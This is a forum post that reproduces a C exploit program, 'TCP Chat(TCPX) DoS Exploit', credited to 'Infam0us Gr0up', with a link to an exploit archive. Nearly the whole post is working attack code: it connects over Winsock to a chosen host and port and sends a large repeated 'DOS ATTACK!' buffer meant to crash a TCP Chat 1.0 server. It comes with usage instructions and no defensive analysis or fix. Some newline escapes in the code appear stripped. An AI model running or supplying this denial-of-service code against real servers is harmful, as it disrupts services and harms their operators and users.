Jump to content
MaHaReT

TCP Chat(TCPX) DoS Exploit

Recommended Posts

Posted
/*

TCP Chat(TCPX) DoS Exploit

----------------------------------------

Resolve host... [OK]

[+] Connecting... [OK]

Target locked

Sending bad procedure... [OK]

[+] Server DoS'ed

Tested on Windows2000 SP4

Info: infamous.2hell.com / basher13@linuxmail.org

*/

#include <string.h>

#include <winsock2.h>

#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =

"*** TCP Chat 1.0 DOS Exploit n"

"***-----------------------------------------------n"

"*** Infam0us Gr0up - Securiti Research Team nn"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"

"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n";

int main(int argc, char *argv[])

{

WSADATA wsaData;

WORD wVersionRequested;

struct hostent *pTarget;

struct sockaddr_in sock;

char *target;

int port,bufsize;

SOCKET inetdos;

if (argc < 2)

{

printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);

printf(" ------------------------------------------n", argv[0]);

printf(" Infam0us Gr0up - Securiti Researchnn", argv[0]);

printf("[-]Usage: %s [target] [port]n", argv[0]);

printf("[?]Exam: %s localhost 1234n", argv[0]);

exit(1);

}

wVersionRequested = MAKEWORD(1, 1);

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];

port = 1234;

if (argc >= 3) port = atoi(argv[2]);

bufsize = 1024;

if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);

if(inetdos==INVALID_SOCKET)

{

printf("Socket ERROR n");

exit(1);

}

printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);

printf(" ------------------------------------------rnn", argv[0]);

printf("Resolve host... ");

if ((pTarget = gethostbyname(target)) == NULL)

{

printf("FAILED n", argv[0]);

exit(1);

}

printf("[OK]n ");

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

sock.sin_family = AF_INET;

sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");

if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))

{

printf("FAILEDn");

exit(1);

}

printf("[OK]n");

printf("Target lockedn");

printf("Sending bad procedure... ");

if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)

{

printf("ERRORn");

closesocket(inetdos);

exit(1);

}

printf("[OK]n ");

printf("[+] Server DoS'edn");

closesocket(inetdos);

WSACleanup();

return 0;

}

http://www.e-hack.org/exploit/archive/018.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...